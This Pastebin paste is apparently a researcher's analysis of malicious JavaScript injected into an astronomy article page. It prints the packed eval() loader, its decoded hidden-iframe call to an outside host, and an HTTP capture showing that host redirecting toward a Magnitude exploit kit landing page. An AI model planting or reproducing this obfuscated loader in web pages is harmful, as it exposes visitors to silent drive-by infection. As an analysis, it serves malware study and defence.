Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Example of a webpage containing injected JS - earthsky.org/astronomy-essentials/double-moon-on-august-27
- // Injected JS
- <script type="text/javascript">
- eval(function(p, a, c, k, e, r) {
- e = function(c) {
- return c.toString(a)
- };
- if (!''.replace(/^/, String)) {
- while (c--) r[e(c)] = k[c] || e(c);
- k = [
- function(e) {
- return r[e]
- }
- ];
- e = function() {
- return '\\w+'
- };
- c = 1
- };
- while (c--)
- if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
- return p
- }('b.9(\'<2 4="5://6-7.8/3/?1" a="0" c="0" d="0" e="f: g;"></2>\');', 17, 17, '||iframe|cumba|src|http|jsg|up|ws|write|border|document|width|height|style|visibility|hidden'.split('|'), 0, {}))
- </script>
- // 'eval' results in the following JS command
- document.write('<iframe src="http://jsg-up.ws/cumba/?1" border="0" width="0" height="0" style="visibility: hidden;"></iframe>');
- // jsg-up.ws is hosting a malicious TDS and redirects to Magnitude EK landing page
- GET http://jsg-up.ws/cumba/?1 HTTP/1.1
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
- Referer: http://earthsky.org/astronomy-essentials/double-moon-on-august-27
- Accept-Language: en
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
- Host: jsg-up.ws
- Connection: Keep-Alive
- HTTP/1.1 302 Found
- Server: nginx/0.7.67
- Date: Wed, 27 Aug 2014 09:58:04 GMT
- Content-Type: text/html; charset=utf-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.3-7+squeeze17
- Expires: Thu, 21 Jul 1977 07:30:00 GMT
- Last-Modified: Wed, 27 Aug 2014 09:58:04 GMT
- Cache-Control: max-age=0
- Pragma: no-cache
- Set-Cookie: bb079=a%3A3%3A%7Bs%3A6%3A%22groups%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1409133484%3B%7Ds%3A7%3A%22streams%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1409133484%3B%7Ds%3A4%3A%22time%22%3Bi%3A1409133484%3B%7D; expires=Sat, 27-Sep-2014 09:58:04 GMT; path=/; domain=.jsg-up.ws
- LOCATION: http://0469f.9d.b30503b.2ebac.abb.de6.57.51.44e.nodzkctpc.settledbacked.in/
- Vary: Accept-Encoding
- Content-Length: 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement